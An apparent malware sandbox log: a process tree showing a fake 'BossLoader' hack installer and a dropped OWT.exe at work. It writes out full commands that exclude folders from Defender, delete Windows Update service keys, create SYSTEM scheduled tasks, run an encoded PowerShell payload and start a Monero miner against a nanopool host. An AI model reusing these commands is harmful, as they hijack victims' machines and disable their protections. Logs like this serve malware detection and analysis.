C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\File_ Cloud_Meadow_v0_1_3_0c_zip ___.vhd"2⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
PID:5864 -
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"3⤵PID:9932
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2608
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x444 0x48c1⤵PID:1112
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵PID:180
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
PID:5528
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1284 -s 14922⤵
- Program crash
PID:3592
-
-
C:\Users\Admin\Downloads\winzip27.exe"C:\Users\Admin\Downloads\winzip27.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3160 -
C:\Users\Admin\AppData\Local\Temp\e609762\winzip27.exerun=1 shortcut="C:\Users\Admin\Downloads\winzip27.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4400
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5896 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:5236
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 610F2F811AED0825151CD8158AC1CB9A2⤵
- Loads dropped DLL
PID:5028
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 175C30A7F0D1815771A914E8F4DD28932⤵
- Loads dropped DLL
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\CloseFAH.exe"C:\Users\Admin\AppData\Local\Temp\CloseFAH.exe"3⤵
- Executes dropped EXE
PID:1612
-
-
C:\Program Files\WinZip\adxregistrator.exe"C:\Program Files\WinZip\adxregistrator.exe" /install="C:\Program Files\WinZip\WinZipExpressForOffice.dll" /privileges=user /GenerateLogFile=false3⤵
- Executes dropped EXE
- Registers COM server for autorun
- Modifies registry class
PID:3732
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks /Create /SC DAILY /TN "WinZip Update Notifier 1" /TR "\"C:\Program Files\WinZip\WZUpdateNotifier.exe\" -checkType=\"scheduled_9AM\" -show" /ST 09:22 /F3⤵
- Creates scheduled task(s)
PID:1416
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks /Create /SC DAILY /TN "WinZip Update Notifier 2" /TR "\"C:\Program Files\WinZip\WZUpdateNotifier.exe\" -checkType=\"scheduled_12PM\" -show" /ST 12:22 /F3⤵
- Creates scheduled task(s)
PID:2616
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks /Create /SC DAILY /TN "WinZip Update Notifier 3" /TR "\"C:\Program Files\WinZip\WZUpdateNotifier.exe\" -checkType=\"scheduled_3PM\" -show" /ST 15:22 /F3⤵
- Creates scheduled task(s)
PID:4652
-
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding CD82D58F85CDE6376ED467B01DE3FC5D E Global\MSI00002⤵
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
PID:1180 -
C:\Program Files\WinZip\adxregistrator.exe"C:\Program Files\WinZip\adxregistrator.exe" /install="C:\Program Files\WinZip\WinZipExpressForOffice.dll" /privileges=admin /GenerateLogFile=false3⤵
- Executes dropped EXE
- Registers COM server for autorun
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4428
-
-
-
C:\Program Files\WinZip\WzPreviewer64.exe"C:\Program Files\WinZip\WzPreviewer64.exe" -regserver winzip642⤵
- Executes dropped EXE
- Registers COM server for autorun
- Modifies registry class
PID:4332
-
-
C:\Program Files\WinZip\WzPreloader.exe"C:\Program Files\WinZip\WzPreloader.exe"2⤵
- Executes dropped EXE
PID:2364
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" /noqp /nodesktop /nostartmenu /nomenugroup /autoinstall /lang 10332⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
PID:3444 -
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:5164
-
-
-
C:\Program Files\WinZip\WzUpdater.exe"C:\Program Files\WinZip\WzUpdater.exe" /schedule2⤵
- Executes dropped EXE
PID:5436
-
-
C:\Program Files\WinZip\WZUpdateNotifier.exe"C:\Program Files\WinZip\WZUpdateNotifier.exe"2⤵
- Executes dropped EXE
PID:1540
-
-
C:\Program Files\WinZip\WzBGTComServer64.exe"C:\Program Files\WinZip\WzBGTComServer64.exe" /REGSERVER2⤵
- Executes dropped EXE
- Registers COM server for autorun
PID:5628
-
-
C:\Program Files\WinZip\WzBGTools64.exe"C:\Program Files\WinZip\WzBGTools64.exe" /s2⤵
- Executes dropped EXE
PID:5724
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:1456
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵PID:6108
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir6108_1967063174\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir6108_1967063174\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={13420734-28c5-4208-9825-5fc026d0a722} --system2⤵
- Executes dropped EXE
PID:5508
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 1284 -ip 12841⤵PID:1320
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.winzip.com/instcmplt.cgi?pid=WNZP&ver=27.0.15240.0&lang=en&osbits=64&vid=ppcn&x-at=ppcn1⤵
- Adds Run key to start application
- Enumerates system info in registry
PID:1800 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x11c,0x120,0xd0,0x124,0x7ffed58b46f8,0x7ffed58b4708,0x7ffed58b47182⤵PID:5792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:22⤵PID:1864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:32⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:82⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:12⤵PID:4596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:12⤵PID:4780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4936 /prefetch:82⤵PID:3456
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe"1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
PID:5560
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Hacks-BossLoader.zip"1⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
PID:5648 -
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"2⤵
- Executes dropped EXE
PID:5096
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Hacks-BossLoader.zip"1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
PID:2768
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1040
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Hacks-BossLoader.zip"1⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
PID:260 -
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"2⤵
- Executes dropped EXE
PID:1112
-
-
C:\Program Files\WinZip\WzWipe32.exe"C:\Program Files\WinZip\WzWipe32.exe" "C:\Users\Admin\AppData\Local\Temp\wzf09a" /nWinZip2⤵PID:1336
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\72c81c61d7bc47b8be5eca73774d63c9 /t 5564 /p 56481⤵PID:6024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:5244
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵PID:5280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵PID:5036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
PID:1336
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
PID:3404
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵PID:6036
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1632 -s 39202⤵
- Program crash
PID:1040
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\e15d705ef5fc4f1cb87ba5b26106f8cb /t 2468 /p 55601⤵PID:884
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 1632 -ip 16321⤵PID:5068
-
C:\Users\Admin\Desktop\BossLoader - Installer.exe"C:\Users\Admin\Desktop\BossLoader - Installer.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbQB5ACMAPgA="2⤵PID:3948
-
-
C:\Users\Admin\AppData\Local\Temp\BossLoader.exe"C:\Users\Admin\AppData\Local\Temp\BossLoader.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5584 -
C:\Users\Admin\AppData\Local\Temp\is-E1BD4.tmp\BossLoader.tmp"C:\Users\Admin\AppData\Local\Temp\is-E1BD4.tmp\BossLoader.tmp" /SL5="$F03F8,40717895,956416,C:\Users\Admin\AppData\Local\Temp\BossLoader.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4228 -
C:\Program Files (x86)\BossLoader\BossLoader.exe"C:\Program Files (x86)\BossLoader\BossLoader.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4552 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 9445⤵
- Program crash
PID:3092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallerGUI.exe"C:\Users\Admin\AppData\Local\Temp\InstallerGUI.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵PID:4936
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3516
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:6132
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3180
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:1116
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:1112
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:5116
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵PID:2012
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵PID:4932
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
- Modifies security service
PID:2160
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵PID:2584
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵PID:5540
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:5968
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵PID:4636
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵PID:4664
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:3360
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵PID:2708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wkdny#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'SDIUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\SubmitDiagInfor.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'SDIUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SDIUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe' }3⤵PID:4604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#euhwzx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "SDIUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\SubmitDiagInfor.exe" }3⤵PID:5424
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn SDIUpdateTaskMachineQC4⤵PID:4220
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4552 -ip 45521⤵PID:2032
-
C:\Program Files (x86)\BossLoader\BossLoader.exe"C:\Program Files (x86)\BossLoader\BossLoader.exe"1⤵
- Executes dropped EXE
PID:4416 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 16802⤵
- Program crash
PID:980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4416 -ip 44161⤵PID:972
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵PID:4136
-
C:\Program Files (x86)\BossLoader\BossLoader.exe"C:\Program Files (x86)\BossLoader\BossLoader.exe"1⤵
- Executes dropped EXE
- Registers COM server for autorun
- Checks computer location settings
- Modifies Control Panel
- Modifies registry class
PID:5468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 30842⤵
- Program crash
PID:4600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5468 -ip 54681⤵PID:1456
-
C:\Program Files\Google\Chrome\SubmitDiagInfor.exe"C:\Program Files\Google\Chrome\SubmitDiagInfor.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3396
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:8316
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:6640
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:6644
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:9416
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:432
-
-
C:\Windows\system32\sc.exesc stop dosvc3⤵PID:9248
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:6084
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:6164
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:9952
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:6372
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:7308
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:9536
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1416
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:7220
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:7672
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:6292
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wkdny#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'SDIUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\SubmitDiagInfor.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'SDIUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SDIUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4248
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe rvznhbods2⤵PID:8516
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵PID:8880
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵PID:9764
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:2096
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe xpctnqxmbsxyrloy 